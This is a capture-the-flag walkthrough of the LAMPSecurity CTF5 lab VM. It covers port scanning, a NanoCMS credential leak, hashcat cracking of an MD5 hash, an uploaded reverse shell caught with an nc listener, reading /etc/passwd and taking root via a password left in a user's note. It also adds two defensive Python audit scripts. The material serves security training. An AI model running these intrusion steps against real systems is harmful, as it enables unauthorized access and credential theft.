LAMPSECURITY: CTF5
https://www.vulnhub.com/entry/lampsecurity-ctf5,84/
Host discovery
nmap -sn 192.168.54.0/24
Port scan
┌──(root💀yunki)-[/home/yunki]
└─# nmap --min-rate 10000 -p- 192.168.54.138 130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 21:01 CST
Nmap scan report for 192.168.54.138
Host is up (0.0021s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
38302/tcp open unknown
MAC Address: 00:0C:29:44:6B:32 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds
Service scan
┌──(root💀yunki)-[/home/yunki]
└─# nmap -sT -sV -O -p22,25,80,110,111,139,143,44,901,3306,38302 192.168.54.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 21:02 CST
Nmap scan report for 192.168.54.138
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp open smtp Sendmail 8.14.1/8.14.1
44/tcp closed mpm-flags
80/tcp open http Apache httpd 2.2.6 ((Fedora))
110/tcp open pop3 ipop3d 2006k.101
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400)
901/tcp open http Samba SWAT administration server
3306/tcp open mysql MySQL 5.0.45
38302/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:44:6B:32 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 192.168.54.138; OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.71 seconds
UDP service scan
┌──(root💀yunki)-[/home/yunki]
└─# nmap -sU -p22,25,80,110,111,139,143,44,901,3306,38302 192.168.54.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 21:03 CST
Nmap scan report for 192.168.54.138
Host is up (0.00059s latency).
PORT STATE SERVICE
22/udp closed ssh
25/udp closed smtp
44/udp closed mpm-flags
80/udp closed http
110/udp closed pop3
111/udp open rpcbind
139/udp closed netbios-ssn
143/udp closed imap
901/udp closed smpnameres
3306/udp closed mysql
38302/udp closed unknown
MAC Address: 00:0C:29:44:6B:32 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.67 seconds
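The three scans above give a service inventory for the host. As an added example (not from the write-up), this Python script parses the -sV table shown above and applies a simple exposure policy of my own, flagging cleartext mail protocols, a network-reachable database, RPC/SMB and the SWAT admin console; the policy entries and the reasons attached to them are this example's assumptions, not findings stated by the author.

```python
import re
# Copied from the nmap -sV output above, embedded so the check runs offline.
NMAP_SV_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp open smtp Sendmail 8.14.1/8.14.1
44/tcp closed mpm-flags
80/tcp open http Apache httpd 2.2.6 ((Fedora))
110/tcp open pop3 ipop3d 2006k.101
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400)
901/tcp open http Samba SWAT administration server
3306/tcp open mysql MySQL 5.0.45
38302/tcp open status 1 (RPC #100024)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Exposure policy (this example's own assumption): nmap service names that
# should not be reachable from an untrusted network, with the reason.
POLICY = {
    "pop3": "cleartext mail retrieval (POP3 without TLS)",
    "imap": "cleartext mail retrieval (IMAP without TLS)",
    "smtp": "mail transfer agent exposed; verify relay restrictions and STARTTLS",
    "mysql": "database listener reachable over the network",
    "rpcbind": "RPC portmapper exposed",
    "netbios-ssn": "SMB file service exposed",
}
# Version strings hinting at a web admin console, which belongs on a management net.
ADMIN_UI_HINTS = ("administration", "admin", "swat")

def parse_nmap_sv(text):
    """Turn the PORT/STATE/SERVICE/VERSION table into dicts for open ports only."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m or m.group(3) != "open":
            continue  # header line, or a closed/filtered port
        rows.append({"port": int(m.group(1)), "proto": m.group(2),
                     "service": m.group(4), "version": m.group(5)})
    return rows

def review_exposure(rows):
    """Return (port, reason) pairs for every open service the policy flags."""
    findings = []
    for r in rows:
        if r["service"] in POLICY:
            findings.append((r["port"], POLICY[r["service"]]))
        if any(h in r["version"].lower() for h in ADMIN_UI_HINTS):
            findings.append((r["port"], "administrative web UI: " + r["version"]))
    return sorted(findings)
```

Note that the port list typed for the -sV scan says 44 where the first scan found 445, so the parser sees 10 open ports, not the 11 from the full scan.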
Nmap vulnerability scan
Inspecting the service on port 80
It turns out to be NanoCMS, so I searched Google for known vulnerabilities.
Let's give it a try: visit http://192.168.54.138/~andy/data/pagesdata.txt
Credentials were found there, with the password stored as an MD5 hash, so the next step is to crack it.
Cracking the hash
First identify it with hash-identifier
┌──(root💀yunki)-[/home/yunki]
└─# hash-identifier 9d2f75377ac0ab991d40c91fd27e52fd
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Then crack it with hashcat
┌──(root💀yunki)-[/home/yunki]
└─# hashcat -a 0 -m 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt
9d2f75377ac0ab991d40c91fd27e52fd:shannon
Logging in over SSH
Logging in over SSH didn't work, so the credentials must be for the web backend; let's try that.
Login successful!
Look for somewhere to upload a reverse shell. Found one.
First start a listener: nc -lvnp 443
Then browse to that page. Shell obtained.
┌──(root💀yunki)-[/home/yunki]
└─# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.138] 52934
bash: no job control in this shell
bash-3.2$ whoami
apache
Privilege escalation
bash-3.2$ sudo -l
sudo: sorry, you must have a tty to run sudo
bash-3.2$ python -c "import pty;pty.spawn('/bin/sh')"
python -c "import pty;pty.spawn('/bin/sh')"
sh-3.2$ whoami
whoami
apache
sh-3.2$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
It's asking me for a password??? I don't know it. Is it the earlier "shannon"? Tried it; nope. Let's see which users exist.
sh-3.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
There are quite a few users here, and users often leave passwords lying around in history files and the like. Worth a try?
sh-3.2$ grep -R -i root /home/* 2>/dev/null
grep -R -i root /home/* 2>/dev/null
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
Binary file /home/patrick/.tomboy/addin-db-000/addin-dir-data/usr_lib_tomboy_c760bb4e.data matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-dir-data/usr_lib_tomboy_addins_b07dc18e.data matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.FileSystemSyncServiceAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.StickyNoteImportAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.EvolutionAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.FixedWidthAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.NoteOfTheDayAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.WebDavSyncServiceAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.ExportToHtmlAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.BacklinksAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.BugzillaAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.Tomboy,0.7_ff7b1edf.mroot matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.PrintNotesAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.SshSyncServiceAddin,0.1.maddin matches
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
Here grep is used to look for anything root-related: -R searches recursively, -i ignores case, the pattern is root, the search covers every user under /home/, and 2>/dev/null suppresses error messages. One file clearly contains a root password: /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
sh-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password
Root password
50$cent</note-content></text>
<last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
<create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
<cursor-position>15</cursor-position>
<width>450</width>
<height>360</height>
<x>0</x>
<y>0</y>
<open-on-startup>False</open-on-startup>
Found the password: 50$cent
Try logging in with patrick:50$cent.
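The grep above finds the note because a Tomboy note is plain XML on disk. As an added example, not part of the write-up, here is a defender-side audit in Python that parses notes in the Tomboy 0.2 format (the namespace is the one from the note above), flags any whose title or body mentions credentials, and reports only the path, title and matched keyword so the report does not become another plaintext copy of the secret. The sample note, its placeholder content and the keyword list are constructed for this example.

```python
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

NS = "{http://beatniksoftware.com/tomboy}"
KEYWORDS = re.compile(r"\b(password|passwd|passphrase|credential)s?\b", re.I)
# Constructed sample in the Tomboy 0.2 note format (not the CTF machine's note).
SAMPLE_NOTE = """<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password
Root password
example-secret-not-real</note-content></text>
</note>
"""

def tomboy_note(path):
    """Return (title, body) for a Tomboy note, or None if the file is not one."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return None
    if root.tag != NS + "note":
        return None
    title = root.findtext(NS + "title", default="")
    content = root.find(f"{NS}text/{NS}note-content")
    body = "".join(content.itertext()) if content is not None else ""
    return title, body

def scan_home(home_dir):
    """Report (path, title, keyword) for notes that mention credentials;
    the note body itself is deliberately never copied into the report."""
    findings = []
    for path in Path(home_dir).rglob("*.note"):
        parsed = tomboy_note(path)
        if parsed is None:
            continue
        title, body = parsed
        hit = KEYWORDS.search(title) or KEYWORDS.search(body)
        if hit:
            findings.append((str(path), title, hit.group(0).lower()))
    return findings

def demo():
    # Build a throwaway home tree holding the sample note, then scan it.
    with tempfile.TemporaryDirectory() as tmp:
        note_dir = Path(tmp) / "patrick" / ".tomboy"
        note_dir.mkdir(parents=True)
        (note_dir / "sample.note").write_text(SAMPLE_NOTE, encoding="utf-8")
        return scan_home(tmp)
```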
# yunki @ yunki in ~ [21:53:03] C:130
$ ssh root@192.168.54.138
root@192.168.54.138's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost ~]# whoami
root
[root@localhost ~]# uname -a
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:44:6B:32
inet addr:192.168.54.138 Bcast:192.168.54.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe44:6b32/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:83445 errors:13 dropped:32 overruns:0 frame:0
TX packets:81820 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5691700 (5.4 MiB) TX bytes:7614164 (7.2 MiB)
Interrupt:18 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:160 errors:0 dropped:0 overruns:0 frame:0
TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15468 (15.1 KiB) TX bytes:15468 (15.1 KiB)